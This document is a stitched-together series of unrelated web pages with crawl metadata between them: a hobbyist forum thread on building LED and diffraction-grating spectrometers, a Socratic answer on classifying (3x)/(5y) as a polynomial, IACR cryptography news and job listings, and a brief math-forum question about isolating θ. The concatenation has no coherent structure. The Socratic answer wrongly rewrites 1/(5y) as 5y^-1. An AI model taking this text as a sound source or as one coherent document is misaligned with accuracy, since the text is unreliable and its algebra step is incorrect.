Not logged in [Login - Register] Sciencemadness Discussion Board » Special topics » Technochemistry » Home made spectrometer Select A Forum Fundamentals   » Chemistry in General   » Organic Chemistry   » Reagents and Apparatus Acquisition   » Beginnings   » Miscellaneous   » The Wiki Special topics   » Technochemistry   » Energetic Materials   » Biochemistry   » Radiochemistry   » Computational Models and Techniques   » Prepublication   » References Non-chemistry   » Forum Matters   » Legal and Societal Issues   » Whimsy   » Detritus   » The Moderators' Lounge Pages:  1  2 Author: Subject: Home made spectrometer zoomer Hazard to Self Posts: 66 Registered: 22-3-2005 Location: Watching the sun set over the saguaros Member Is Offline Mood: Always Curious Overdriving an LED will kill it woelen, way cool project, I hope it works out. My 2c: While overdriving an LED (forcing more current than it's made for) will indeed modify the output wavelength slightly, it dramitically shortens the lifespan of the devise, as in it may last days instead of years. Since you would need to recalibrate every time you replaced an element, I doubt the small variation would be worth it. A few other LED operation notes: - All LEDs are made the same way, with simple processes and cheap materials. Between any two similar types, the difference in price comes from testing. Testing of an individual device is the only way to know it's actual characteristics since it cannot be determined with much accuracy before manufacture. Generally, the more expensive a semiconductor, the closer it is to nominal specifications. Some are even sold "certified" where you are given the actual test results for specific device you bought. They are very expensive, US$5-$10 apiece, but may be worth it in this application since that info is critical to you. - "White" LEDs are really just a blue, green, and red LED on the same die, so in a spectrograph it would have 3 narrow bands, instead of the nice broadband output that you are looking for. Z Marvin International Hazard Posts: 962 Registered: 13-10-2002 Member Is Offline As has been indicated you can overcurrent an LED without burning it out by very rapid pulsing. The peak current gets you the wavelength shift, the overall power usage determines the lifespan, provided the switching is fast enough. I'm surprised the shift is that much, I'd have though the colour change would be due to unwanted bands apearing in the spectrum, rather than a shift and I'm still pretty convinced thats what is going on witht he green LED turning orange. White LEDs are generally not 3 colours in the same case, but a blue LED with a broadband phosphor. Semiconductor lasers have a very narrow bandwidth, and can be tuned very slightly by altering the temperature. Cavity modes are a problem with this method but a red laser diode might be tunable by about 10nm over a 40degree range. IrC International Hazard Posts: 2710 Registered: 7-3-2005 Location: Eureka Member Is Offline Mood: Discovering When pulsing be sure to tailor the waveshape and amplitude correctly as the crystal structure can deform or crack, from a piezo type electro mechanical effect. I used to build power supplies for laser diodes for Meredith Instruments and I learned the hard way as this was almost 20 years ago and damn those diodes were expensive back then. woelen Administrator Posts: 5855 Registered: 20-8-2005 Location: Netherlands Member Is Offline Mood: interested Quote: Originally posted by Quibbler I've just re-read the specs on your LEDs 12000cd you might want to consider making a death ray instead. And are you sure that the band width is 1 nm you would be lucky to get that from a laser diode. Sorry for me being off a factor of 1000 . Indeed not very smart. Of course, I meant 12000 mcd. See for example: http://stores.ebay.de/Michis-LED_LED-Weis_W0QQcolZ2QQdirZ1QQ... They have many LED's of different colors and the non-whites are specified with the central wavelength mentioned. Brightness is between 5000 and 12000 mcd (not cd ) The art of wondering makes life worth living... Want to wonder? Look at http://www.oelen.net/science Quibbler Hazard to Self Posts: 61 Registered: 15-7-2005 Location: Trinidad and Tobago Member Is Offline Mood: Deflagrated I made a mistake too only a factor of two though. My half height widths should be 26 nm (not 13 nm). I'm pretty sure that if you don't have the over current on for too long not much damage will be done. I am assuming it is the heat disappation that does the damage? My worry is that Beer-Lambert law only works for monochromatic radiation it's because of the logarithmic stuff it there. But with an LED we know (roughly) what the shape of the emission is (Gaussian maybe?) so if enough points are collected it should be possible to work back to monochromatic. I find that the following has the largest range of LEDs. They cover those difficult regions 660-880 and 460-520. http://www.roithner-laser.com/LED_diverse.htm unionised International Hazard Posts: 2826 Registered: 1-11-2003 Location: UK Member Is Offline The Beer Lambert law fails with non- monochromatic radiation, but it isn't to do with the logs in it. Imagine that you are trying to measure some red chemical by seeing how much green light it absorbs. Unfortunately, your green (monochromated) light isn't as good as you think it is, for example let's say it has some small amount of red light in it. As you increase the concentration of the dye it absorbs more and more of the green light and so less light gets through to the detector. On the other hand, the red light goes through the dye without any problem. No matter how much dye you put in the solution the detector will never see "zero" light - the closest it will get is when (virtually) all the green light is absorbed by the red dye and all it sees is the red light. If you plot out the LOG(absorbance) versus the concentration the line will not be straight- it will be close at moderate concentrations but it will look like a failure of the B-L law. The effect is still present (of course, it's smaller), even if the "wrong colour" light is almost the same wavelength as the "right" wavelength, and that's what you have with non monochromatic light. You can to some extent avoid this problem by measuring the absorbance at a wavetength where the rate of change of absorbtion with wavelength is small. Normally this means a peak in the absorbtion spectrum but a valley works well too. (There are similar problems with "stray light". Quibbler Hazard to Self Posts: 61 Registered: 15-7-2005 Location: Trinidad and Tobago Member Is Offline Mood: Deflagrated I'm sure you meant LOG(transmission) against conc. - absorbance is already logged. OK it is an extreme example you have chosen even if the spread of wavelength is such that the molar absorption coeff is different over the wavelength range B-L law will not work. And I'm still sure its because absorbance is proportional to conc, but absorbance is LOG(transmission) so the extinctions do not add nicely. I guess this really does not matter if you just want a pretty graph abs vs wavelength. KMnO4 is a nice one to try it's the only compound i've found with a marginally interesting visible spectrum. unionised International Hazard Posts: 2826 Registered: 1-11-2003 Location: UK Member Is Offline Oops! Yep, my mistake. NdFeB magnets disolve in acid (you only need a little one). Nd+++solutions have another relatively interesting spectrum. If you want to leave the inorganics behind, carotene and chlorophyll are quite interesting too. Some of the polycyclic aromatics have nice UV spectra but they are in the UV (not to mention the toxicity of some of them). frogfot Hazard to Others Posts: 212 Registered: 30-11-2002 Location: Sweden Member Is Offline Mood: happy Holy cow! What about a homemade HPLC coupled to UV detector? Seems to be easy to make in theory, using silica or cellulose column. There's probably a thread on this. Just to be on topic, using the standard (commersial) LEDs in homemade spectrometer would be a good way to characterise the compounds among madscientists Say, people can report prepared compounds having absorbtions at specific wavelengths.. mm [Edited on 3-12-2005 by frogfot] Tacho International Hazard Posts: 582 Registered: 5-12-2003 Location: Brazil. Member Is Offline I agree that a standart simple homebuilt spectrometer would be great for amateurs to compare their results. I have a few doubts that LEDs will do the job, though. Their band of emmission seems too broad, usually 50nm. Check this from I-am-a-fish link: http://ledlights.home.att.net/spectra/660.gif http://ledlights.home.att.net/spectra/spec5.gif http://ledlights.home.att.net/spectra/orange.gif http://ledlights.home.att.net/spectra/etggrn.gif I stoped working on my idea, because I became too interested in Ranque-Hilsch vortex tubes. But, since anyone trying to build an spectrometer is probably going to face some mechanical chalenges, I post the picture and description of my constant light device, because I think the idea is pretty neat and may have other uses for hardware hackers. I used a broken HDD chassis to do 90% of the work for me. The HDD has an arm that moves the heads from track to track. The arm is driven by a coil in between magnets, so that depending on the direction of the current flowing, it goes back and forward. It's not hard to identify the wires that connet to the coil and make a direct connection to the circuit. Usually the arm has one beam for each disk. I tore away the unwanted ones. The chassis already had an oblong slot that I used as a light passage. A photodiode on the other side (in the picture it's not fixed, it's loose for tests) senses the light and feeds a op-amp (classic design) voltage comparator: Too much light and the current flows in one direction, pulling the voice coil arm and shutting the light slot; when too little ligth passes, current reverse its flow, opening the light slot. Initially it had some vibration, but a 470K ohm feedback resistor made it firm as a rock. A piece of black paper/foil had to be glued to the arm to make it able to totally close the slot. The extra circuit you see on the bottom/center of the picture is a 555 based circuit that changes frequency with light changes on photodiode 2 and would be used in the future as the sample sensor- right now it's just connected to a loudspeaker so I can hear it tick. Literally. I closed the other holes in the chassi with black electric tape, hence the black squares all over the picture. jimwig Hazard to Others Posts: 217 Registered: 17-5-2003 Location: the sunny south Member Is Offline Here is what I consider to be excellent how to concerning various spectro type devices. They are all Scientific American magazines. Available all the over library spectrum of the world. Spectrograph, astronomical, 1956 Sep, pg 259 Spectrograph. auroral, 1961 Jan, pg 177 Spectrograph. Bunsen's, 1955 June pg 122 Spectrograph. how to make a diffraction-grating type, 1966 Sep, pg 277 Spectrograph, ultraviolet. construction of, 1968 Oct, pg 126 Spectroheliograph. how to make, 1958 Apr, pg 126 Spectrohelioscope. how to construct, 1974 Mar, pg 110 Spectrometer. beta-ray, 1958 Sep, pg 197 Spectrometer. magnetic-resonance, 1959 Apr, pg 171 Spectrometer. mass. how to construct, 1970 Jly, pg 120 Spectrophotometer, construction of, 1968 May, pg 140 Spectrophotometer, recording, how to construct, 1975 Jan, pg 118 Spectroscopy of candle flame, 1978 Apr, pg 154 indigofuzzy Hazard to Others Posts: 143 Registered: 1-10-2006 Location: DarkCity, Bay of Rainbows, Moon Member Is Offline Mood: Rarefied. Quote: Originally posted by zoomer - "White" LEDs are really just a blue, green, and red LED on the same die, so in a spectrograph it would have 3 narrow bands, instead of the nice broadband output that you are looking for. Z Actually, Most white LEDs are made with either a blue or near-UV led die and a coating of a yellow-glowing phosphor. This means there are actually two peaks - one in the blue to near-uv, and a wider one in the yellow. Quibbler Hazard to Self Posts: 61 Registered: 15-7-2005 Location: Trinidad and Tobago Member Is Offline Mood: Deflagrated Well I've finally made a led spectrophotometer. I managed to get some fairly monochromatic leds with narrow beam angles. I have set up 5 at 490,520,574,612 and 644 nm. If they are slightly angled they can be directed onto one detector - a phototransistor (SFH309). I found LDRs to have too slow a response. The voltage on the phototransistor is converted into a frequency using a LM358 as a VCO (I got the circuit from the National Semiconductor data sheet) The pulses are fed into a computer through the parallel port and counted over 1/2 sec. The leds are swiched using the parallel port also. I have encountered two major problems led output varies with time hence the short measuring time (1/2 sec), and the dynamic range of the phototransistor is so large that different resitors need to be switched in the VCO to cover any kind of absorbance range. I am now in the process of trying to calibrate - this is turning out to be very difficult there is a lot of non-linearity here. I hope I can get a simple polynomial fit between raw output and absorbance, but at the moment measuring lots of absorbance standards is proving to be a real pain. Quibbler Hazard to Self Posts: 61 Registered: 15-7-2005 Location: Trinidad and Tobago Member Is Offline Mood: Deflagrated I've taken a piture of it. In the middle is the sample holder (white circular thing) this is a piece of PVC pipe. The board on the left is the detector board (the phototransistor has a piece of red tubing over it to limit reflected light). On the right is the LED switching board. 12AX7 Post Harlot Posts: 4803 Registered: 8-3-2005 Location: oscillating Member Is Offline Mood: informative Don't forget that silicon loves exponentials. You'll need a high order polynomial to equal that It should be that light input is proportional to current flow through a photojunction, which is then exponential (Eber-Molls equ.) through the transistor. Tim Seven Transistor Labs LLC http://seventransistorlabs.com/ Electronic Design, from Concept to Layout. Need engineering assistance? Drop me a message! Twospoons International Hazard Posts: 751 Registered: 26-7-2004 Location: Middle Earth Member Is Offline Mood: Full of B12 - YIPPEE! if the LED output varies with time, maybe they are being overdriven, heating up and thus changing output. Perhaps you should allow each led sufficient on-time to stabilise thermally. A photodiode (in reverse bias photocurrent mode) is a better choice for linearity - as 12AX7 points out :phototransistors have exponential response. If you can, pick one for which there is a quantum efficiency curve in the datasheet - that will tell you relative sensitivity to different wavelengths. Your optical setup may benefit from a diffuser in front of the LEDs (frosted glass?), with a lightpipe of around 5-10cm length to even out the illumination field (glass, acrylic or bright anodised Al tube), since you can't physically put the LEDs in the same place. The wife thinks I\'m with the mistress, the mistress thinks I\'m with the wife - so I can go to my workshop and get a few things done! Polverone Now celebrating 14 years of madness Posts: 3120 Registered: 19-5-2002 Location: The Sunny Pacific Northwest Member Is Offline Old thread bump: Alexander Scheeline has made a guided inquiry project for students that revolves around building a spectrophotometer with cell phone hardware. It could be used as-is or taken as a jumping off point for something more advanced. PGP Key and corresponding e-mail franklyn International Hazard Posts: 2990 Registered: 30-5-2006 Location: Da Big Apple Member Is Offline Do it yourself Spectrophotometer How useful is it to have a spectrophotometer for identification and analysis of organic materials ? I understand it has wider application in biochemistry than in organic chemistry. While I perused analytic instruments on EBAY I found this item. Given the usual cost of such things it looks tempting. http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=310288761... http://www.cienytec.com/PDFS/Espec_SPEC20_OpMan_ing.pdf I then searched the topic some and discovered that a computer utility exists which with simple gear as can be seen below, will analyze a jpeg photo taken with a digital camera as would a dedicated spectrophotometer instrument. Literally a do it yourself project. How cool is that ! - Ha ! Polverone beat me to it - http://www.news.illinois.edu/WebsandThumbs/scheeline,alex/sp... - The story - http://www.wired.com/gadgetlab/tag/spectrophotometry http://www.news.illinois.edu/news/10/1007scheeline_spectroph... - How to - http://www.asdlib.org/onlineArticles/elabware/Scheeline_Kell... http://www.asdlib.org/onlineArticles/elabware/Scheeline_Kell... - More http://www.asdlib.org/onlineArticles/elabware/Scheeline_Kell... - Download the stand alone program here - http://www.asdlib.org/onlineArticles/elabware/Scheeline_Kell... . Ephoton National Hazard Posts: 465 Registered: 21-7-2005 Member Is Offline Mood: trying to figure out why I need a dark room retreat when I live in a forest of wattle. not sure if this has been posted here yet and sorry to bring up an old subject but there was a guy in the Czech Technical University that made a nir spectrometer that scans from 400nm too 900nm. he placed his build cost at 25 euro and has handed up for evaluation a spectrometer with usb connectivity and full plans that include all electronics theory and code to run it. I havent seen it untill tonight and I was looking into a stellarnet for over a thousand dollars with simular capabilities. It is far from perfect but a great start I think. http://fzu.cz/~dominecf/electronics/usb-spect/usb_spectromet... e3500 console login: root bash-2.05# mayko International Hazard Posts: 501 Registered: 17-1-2013 Location: Carrboro, NC Member Is Offline Mood: anomalous Cool work everyone! My first stab at DIY spectrophotometry was quite crude, consisting of a tube, a flashlight, and a transmission diffraction grating. This passed light through the sample and projected the resulting spectrum onto the wall. A CdS sensor from an automatic nightlight was mounted on a graphing calculator to slide back and forth through the spectrum, and measurements were taken by hand with a multimeter. Next step: I mounted the device in a wooden box (used to contain clementine oranges). A flashlight beam was passed the sample and a slit, and the beam was bounced off of a reflection transmission grating (a piece of a CD). Because the grating was on top of a servo motor, it could be rotated, which would scan the spectrum across the sensor. All of this was controlled by an Arduino and a Python script. I've also put together an FAQ section and bibliography of other DIY Spectro projects. Next time I update, I'll add this discussion Version I Version II FAQ/Biblio White Yeti International Hazard Posts: 816 Registered: 20-7-2011 Location: Asperger's spectrum Member Is Offline Mood: delocalized I don't know if this is helpful, but LED wavelength output is temperature dependent. Bring out the liquid nitrogen! http://www.youtube.com/watch?v=4w1HifFayNU What you could do is measure the rate of change of wavelength with respect to time, assume that output intensity is fairly constant. Then you can sweep the spectrum with just a few LEDs. Even better, cool multiple LEDs simultaneously so that the frequency range of one LED ends where the frequency range of another LED begins. How does that sound? "Ja, Kalzium, das ist alles!" -Otto Loewi nezza Hazard to Others Posts: 199 Registered: 17-4-2011 Location: UK Member Is Offline Mood: phosphorescent I too wanted to be able to visualise and measure spectra. This is how I went about it. 1. I bought a simple direct view spectroscope (From Patton Hawksley). 2. Araldite it to a compact camera making sure the spoectrum can be sphotographed 3. Work out where in the image the spectrum falls. 4. Use Paint shop pro to cut out the same part of the image each time. 5. Blur and tidy the image up a bit. 6. Import into BBC basic and run a program to measure the peaks. The output was calibrated using lasers of known output frequency. I have added a couple of pictures of the modified camera and the final output. bfesser Resident Wikipedian Posts: 2114 Registered: 29-1-2008 Member Is Offline Wonderful! Thank you for sharing this. Now we'll have a use for any old digital cameras we have lying around, collecting dust. I had been waiting for the Desktop Spectrometry Kit from Public Lab to become available. You may object that it's a little pricey at 40USD, but I think it's a pretty slick solution and hope to purchase one with my next tax refund. They also have a Foldable Mini Spectrometer which works with smart phone cameras; 10USD for the kit or print/scrounge your own . Their Infrared (IR) Photography Project also looks promising ('237% funded' on Kickstarter!). Desktop Spec. Kit Foldable Spec. Kit 'IR Photography Project' RasPi Camera Module Finally, I'm very excited that the Camera Module for the Raspberry Pi (RasPi) is finally available (from my favorite vendor, Adafruit )! I look forward to using these for astrophotography, IR photography, microscopy, and possibly building a RasPi based spectrophotometer with my damaged Chinese Model B rev 2—the UK board is safe. I hope that someday we'll all have near-IR–Vis spectrometers in our home labs or even in our pockets. TL;DR: Click here! phlogiston International Hazard Posts: 959 Registered: 26-4-2008 Location: flatland Member Is Offline Mood: Somniculosus nezza, do you know the output signal vs. light intensity at different wavelengths for you camera? In other words: (how) do you calibrate the intensity scale? ----- "If a rocket goes up, who cares where it comes down, that's not my concern said Wernher von Braun" - Tom Lehrer AndersHoveland Hazard to Other Members, due to repeated speculation and posting of untested highly dangerous procedures! Posts: 1986 Registered: 2-3-2011 Member Is Offline Quote: Originally posted by Quibbler I've had a look at the spectrum of some LEDs. I have several LED light bulbs. While the light is yellowish "white", I do not care for the light they give off. They do not have the same spectrum as incandescent, and it looks a little strange, difficult to describe. The white LED light is like a fluorescent yellowish tinted with purplish blue, and a little pinkish colored at the same time. When I looked at the white LED light through a prism, the deep red was not as brilliant, it was more orangish, and the band where there should have been a green-blue and light blue color was very dim. The light from a typical fluorescent lamp has just 3 bright lines, red, green, and blue. There are also a few violet lines, and blurry very dim bands in the yellow and lighter blue, if one looks closely. Definitely not a full spectrum light source. I have also looked at the spectrum of metal halide street lamps with a CD grating. Many distinct bands of colors. The strange thing that do not understand is there is a bright thick yellow-orangish band that fades outward, but in the center of this band is a clear distinct dark line. Is this the sodium line? Is there some sort of forbidden quantum state between those two lines? [Edited on 10-7-2013 by AndersHoveland] Pages:  1  2 Sciencemadness Discussion Board » Special topics » Technochemistry » Home made spectrometer Select A Forum Fundamentals   » Chemistry in General   » Organic Chemistry   » Reagents and Apparatus Acquisition   » Beginnings   » Miscellaneous   » The Wiki Special topics   » Technochemistry   » Energetic Materials   » Biochemistry   » Radiochemistry   » Computational Models and Techniques   » Prepublication   » References Non-chemistry   » Forum Matters   » Legal and Societal Issues   » Whimsy   » Detritus   » The Moderators' Lounge
2016-10-01 03:16:48
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.34972473978996277, "perplexity": 3846.9907870667166}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-40/segments/1474738662507.79/warc/CC-MAIN-20160924173742-00197-ip-10-143-35-109.ec2.internal.warc.gz"}
https://socratic.org/questions/how-do-you-determine-if-3x-5y-is-a-polynomial-and-if-so-is-it-a-monomial-binomia
# How do you determine if (3x)/(5y) is a polynomial and if so, is it a monomial, binomial, or trinomial? Jan 26, 2018 $\frac{3 x}{5 y}$ is not a monomial, binomial, trinomial, or polynomial. #### Explanation: To find out why it's not classified, let's rewrite $\frac{3 x}{5 y}$: $\frac{3 x}{5 y} = 3 x \cdot \frac{1}{5 y} = 3 x \cdot 5 {y}^{-} 1$ An expression with a negative exponent cannot be classified as a polynomial. I recommend watching this video about classifying polynomials including monomials, binomials, trinomials, and none of these.
2022-05-27 00:00:11
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 3, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6205969452857971, "perplexity": 1756.8121003268236}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662627464.60/warc/CC-MAIN-20220526224902-20220527014902-00381.warc.gz"}
https://www.iacr.org/news/legacy.php?p=detail&id=1628
International Association for Cryptologic Research # IACR News Central You can also access the full news archive. Further sources to find out about changes are CryptoDB, ePrint RSS, ePrint Web, Event calender (iCal). 2012-08-18 06:17 [Pub][ePrint] In this paper we present some interesting connections between primitive roots and quadratic non-residues modulo a prime. Using these correlations, we improve the existing randomized algorithm for generating primitive roots and we propose a polynomial deterministic algorithm for generating primitive roots for primes with special forms (for example, for safe primes). The key point of our improvement is the fact that the evaluation of Legendre-Jacobi symbol is much faster than an exponentiation. 06:17 [Pub][ePrint] This paper proposes a pseudo random number generator (PRNG) based on quasigroups. The proposed PRNG has low memory requirements, is autonomous and the quality of the output stream of random numbers is better than other available standard PRNG implementations (commercial and open source) in majority of the tests. Comparisons are done using the benchmark NIST Statistical Test Suite and compression tools. Results are presented for quality of raw stream of random numbers and for encryption results using these random numbers. 06:17 [Pub][ePrint] Several masking schemes to protect cryptographic implementations against side-channel attacks have been proposed. A few considered the glitches, and provided security proofs in presence of such inherent phenomena happening in logic circuits. One which is based on multi-party computation protocols and utilizes Shamir\'s secret sharing scheme was presented at CHES 2011. It aims at providing security for hardware implementations - mainly of AES - against those sophisticated side-channel attacks that also take glitches into account. One part of this article deals with the practical issues and relevance of the aforementioned masking scheme. We first provide a guideline on how to implement the scheme for the simplest settings, and address some pitfalls in the scheme which prevent it to be practically realized. Solving the problems and constructing an exemplary design of the scheme, we provide practical side-channel evaluations based on a 65nm-technology Virtex-5 FPGA. We still observe univariate side-channel leakage, which is not expected according to the proven security of the scheme. We believe that the leakage is due to a combination of static power consumption and glitches in the circuit which is observed for the first time in practice. Dependency of static power consumption of nano-scale devices on processed data - which was warned before to be problematic - becomes now critical. Our result does not invalidate the given security proof of the scheme itself, but instead shows that the underlying model to obtain the proofs no longer fits to the reality. This is true not only for the scheme showcased here, but also for most other known masking schemes. As a result, due to the still ongoing technology shrinkage most of the available data-randomizing side-channel countermeasures will not be able to completely prevent univariate side-channel leakage of hardware implementations. Our work shows that new models must be created under which the security of new schemes can be proven considering leakages through both dynamic and static power consumption. 06:17 [Pub][ePrint] The first sender equivocable encryption scheme secure against chosen-ciphertext attack (NC-CCA) was proposed by Fehr et al. in Eurocrypt 2010. The scheme was also secure against selective opening chosen-ciphertext attack (SO-CCA), since NC-CCA security implies SO-CCA security. The NC-CCA security proof of the scheme relies on security against substitution attack of a new primitive, cross-authentication code\'\'. However, the security of cross-authentication code can not guarantee anything when all the keys used in the code are exposed. The key observation is that in the NC-CCA game, the randomness used in the generation of the challenge ciphertext is exposed to the adversary. This random information can be used to recover all the keys involved in cross-authentication code, and forge a ciphertext (like a substitution attack of cross-authentication code) that is different from but related to the challenge ciphertext. And the response of decryption oracle leaks information. This leaked information is employed by an attack to spoil the NC-CCA security proof of the sender equivocable encryption scheme encrypting multi-bits. We also propose a new scheme encrypting single-bit plaintext, free of cross-authentication code, and prove its NC-CCA security. 06:17 [Pub][ePrint] Functional encryption (FE) is a powerful cryptographic primitive that generalizes many asymmetric encryption systems proposed in recent years. Syntax and security definitions for general FE were recently proposed by Boneh, Sahai, and Waters (BSW) (TCC 2011) and independently by O\'Neill (ePrint 2010/556). In this paper we revisit these definitions, identify a number of shortcomings in them, and propose a new definitional approach that overcomes these limitations. Our definitions display good compositionality properties and allow us to obtain new feasibility and impossibility results for adaptive token extraction attack scenarios that shed further light on the potential reach of general FE for practical applications. The main contributions of the paper are the following: - We show that the BSW definition of semantic security fails to reject intuitively insecure FE schemes where a ciphertext leaks more about an encrypted message than that which can be recovered from an image under the supported functionality. Our definition (as O\'Neill\'s) does not suffer from this problem. - We introduce an orthogonal notion of {\\em setup security} that rejects all FE schemes where the master secret key may give unwanted power to the TA, allowing the recovery of extra information from images under the supported functionality. We prove FE schemes supporting {\\em all-or-nothing} functionalities are intrinsically setup-secure and further show that many well-known functionalities {\\em are} all-or-nothing. - We extend the equivalence result of O\'Neill between indistinguishability and semantic security to restricted {\\em adaptive} token extraction attacks (the standard notion of security for, e.g., IBEs and ABEs). We establish that this equivalence holds for the large class of all-or-nothing functionalities. Conversely, we show that the proof technique used to establish this equivalence cannot be applied to schemes supporting a one-way function. - We show that the notable {\\em inner-product} functionality introduced by Katz, Sahai, and Waters (EUROCRYPT 2008) can be used to encode a one-way function under the small integer solution problem, and hence natural approaches to prove its (restricted) adaptive security fail. This complements the equivalence result of O\'Neill for the non-adaptive case, and leaves open the question of proving the semantic security of existing inner-product encryption schemes. 06:17 [Pub][ePrint] Direct Anonymous Attestation (DAA) is one of the most complex cryptographic protocols deployed in practice. It allows an embedded secure processor known as a Trusted Platform Module (TPM) to attest to the configuration of its host computer without violating the owner\'s privacy. DAA has been standardized by the Trusted Computing Group. The security of the DAA standard and all existing schemes is analyzed in the random oracle model. We provide the first constructions of DAA in the standard model, that is, without relying on random oracles. As a building block for our schemes, we construct the first efficient standard-model signatures of knowledge, which have many applications beyond DAA. 2012-08-17 05:12 [Job][New] Japan Advanced Institute of Science and Technology (JAIST) invites applicants to a five-year term assistant professor position in SCHOOL OF INFORMATION SCIENCE. The appointee is expected to start her/his academic and educational activities in JAIST on April 1st, 2013. A primary objective of this position is to promote international research and development activities in Cryptology and Information Security, where candidates have to be highly competent in conducting research work. Applicants have to hold Ph.D degree, and be qualified for high scientific activities through participating in international research initiatives. The salary is automatically decided depending on your experiences and age (Typical example of annual income is about 4,000,000 to 5,000,000 yen per year (including tax)). Security group in JAIST can research by making full use of the advanced parallel computer system. 2012-08-16 20:55 [Event][New] Submission: 7 October 2012 From December 2 to December 2 07:59 [Event][New] Submission: 8 September 2012 From February 25 to February 27 Location: Cape Town, South Africa 07:59 [Event][New] Submission: 27 August 2012 From January 29 to February 1 07:58 [Job][New] Topic: Lattice-based cryptography Supervisor: Prof. Steven Galbraith Duration: Approx 18-24 months Salary: Approx NZ$55,000-70,000 (US$ 44K-56K) depending on the experience of the candidate and other factors Start date: Preferably between November 2012-March 2013 Application process: There is no formal application process. If you are interested in learning more about the position then please send a copy of your CV by email to s.galbraith (at) math.auckland.ac.nz , preferably before September 8, 2012. Project Details: The project will be on the security and implementation of lattice-based cryptosystems. The specific topic of the research will depend on the technical skills and experience of the successful candidate. Some possible projects might include: • development and analysis of algorithms for lattice problems • development and security analysis of lattice-based cryptosystems • efficient software and/or hardware implementation of lattice systems The successful applicant will have (or be very near to completion) a PhD in mathematics/computer science/engineering and a research track record in at least one of the following areas: • theoretical cryptography • computational number theory and lattices • software/hardware implementation of cryptographic systems.
2017-04-28 15:56:09
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.37263455986976624, "perplexity": 2081.2332508050545}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917122996.52/warc/CC-MAIN-20170423031202-00369-ip-10-145-167-34.ec2.internal.warc.gz"}
http://mathhelpforum.com/trigonometry/176389-help-isolate.html
# Math Help - Help to isolate θ 1. ## Help to isolate θ Isolate θ cos 2θ = cos y cos x I have no clue where to start, some help would be great. Nvm i figured it out 2. Take inverse $\cos$ of both sides then divide by 2. What do you get?
2015-03-29 16:10:07
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 1, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7548320293426514, "perplexity": 2131.1105043604416}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-14/segments/1427131298576.76/warc/CC-MAIN-20150323172138-00056-ip-10-168-14-71.ec2.internal.warc.gz"}
https://www.physicsforums.com/threads/path-connected-connected-space.898802/
